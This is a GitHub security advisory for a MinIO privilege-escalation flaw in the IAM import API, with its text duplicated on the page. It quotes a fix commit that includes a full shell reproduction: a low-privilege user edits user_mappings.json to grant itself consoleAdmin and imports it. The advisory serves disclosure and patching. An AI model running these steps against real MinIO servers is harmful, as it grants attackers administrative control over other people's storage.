Headline
GHSA-cwq8-g58r-32hg: MinIO vulnerable to privilege escalation in IAM import API
Impact
Privilege escalation in IAM import API, all users are impacted since MinIO commit 580d9db85e04f1b63cc2909af50f0ed08afa965f
Patches
commit f246c9053f9603e610d98439799bdd2a6b293427
Author: Aditya Manthramurthy <[email protected]>
Date: Wed Dec 11 18:09:40 2024 -0800
fix: Privilege escalation in IAM import API (#20756)
This API had missing permissions checking, allowing a user to change
their policy mapping by:
1. Craft iam-info.zip file: Update own user permission in
user_mappings.json
2. Upload it via `mc admin cluster iam import nobody iam-info.zip`
Here `nobody` can be a user with pretty much any kind of permission (but
not anonymous) and this ends up working.
Some more detailed steps - start from a fresh setup:
```
./minio server /tmp/d{1...4} &
mc alias set myminio http://localhost:9000 minioadmin minioadmin
mc admin user add myminio nobody nobody123
mc admin policy attach myminio readwrite nobody nobody123
mc alias set nobody http://localhost:9000 nobody nobody123
mc admin cluster iam export myminio
mkdir /tmp/x && mv myminio-iam-info.zip /tmp/x
cd /tmp/x
unzip myminio-iam-info.zip
echo '{"nobody":{"version":1,"policy":"consoleAdmin","updatedAt":"2024-08-13T19:47:10.1Z"}}' > \
iam-assets/user_mappings.json
zip -r myminio-iam-info-updated.zip iam-assets/
mc admin cluster iam import nobody ./myminio-iam-info-updated.zip
mc admin service restart nobody
```
Workarounds
There are no workarounds possible, all users are advised to upgrade immediately.
References
Refer https://github.com/minio/minio/pull/20756 for more information
- GitHub Advisory Database
- GitHub Reviewed
- GHSA-cwq8-g58r-32hg
MinIO vulnerable to privilege escalation in IAM import API
High severity GitHub Reviewed Published Dec 15, 2024 in minio/minio • Updated Dec 16, 2024
Package
gomod github.com/minio/minio (Go)
Affected versions
>= 0.0.0-20220623162515-580d9db85e04, < 0.0.0-20241213221912-68b004a48f41
Patched versions
0.0.0-20241213221912-68b004a48f41
Impact
Privilege escalation in IAM import API, all users are impacted since MinIO commit 580d9db85e04f1b63cc2909af50f0ed08afa965f
Patches
commit f246c9053f9603e610d98439799bdd2a6b293427
Author: Aditya Manthramurthy <[email protected]>
Date: Wed Dec 11 18:09:40 2024 -0800
fix: Privilege escalation in IAM import API (#20756)
This API had missing permissions checking, allowing a user to change
their policy mapping by:
1. Craft iam-info.zip file: Update own user permission in
user_mappings.json
2. Upload it via `mc admin cluster iam import nobody iam-info.zip`
Here `nobody` can be a user with pretty much any kind of permission (but
not anonymous) and this ends up working.
Some more detailed steps - start from a fresh setup:
```
./minio server /tmp/d{1...4} &
mc alias set myminio http://localhost:9000 minioadmin minioadmin
mc admin user add myminio nobody nobody123
mc admin policy attach myminio readwrite nobody nobody123
mc alias set nobody http://localhost:9000 nobody nobody123
mc admin cluster iam export myminio
mkdir /tmp/x && mv myminio-iam-info.zip /tmp/x
cd /tmp/x
unzip myminio-iam-info.zip
echo '{"nobody":{"version":1,"policy":"consoleAdmin","updatedAt":"2024-08-13T19:47:10.1Z"}}' > \
iam-assets/user_mappings.json
zip -r myminio-iam-info-updated.zip iam-assets/
mc admin cluster iam import nobody ./myminio-iam-info-updated.zip
mc admin service restart nobody
```
Workarounds
There are no workarounds possible, all users are advised to upgrade immediately.
References
Refer minio/minio#20756 for more information
References
- GHSA-cwq8-g58r-32hg
- minio/minio#20756
- minio/minio@580d9db
- minio/minio@f246c90
Published to the GitHub Advisory Database
Dec 16, 2024
Last updated
Dec 16, 2024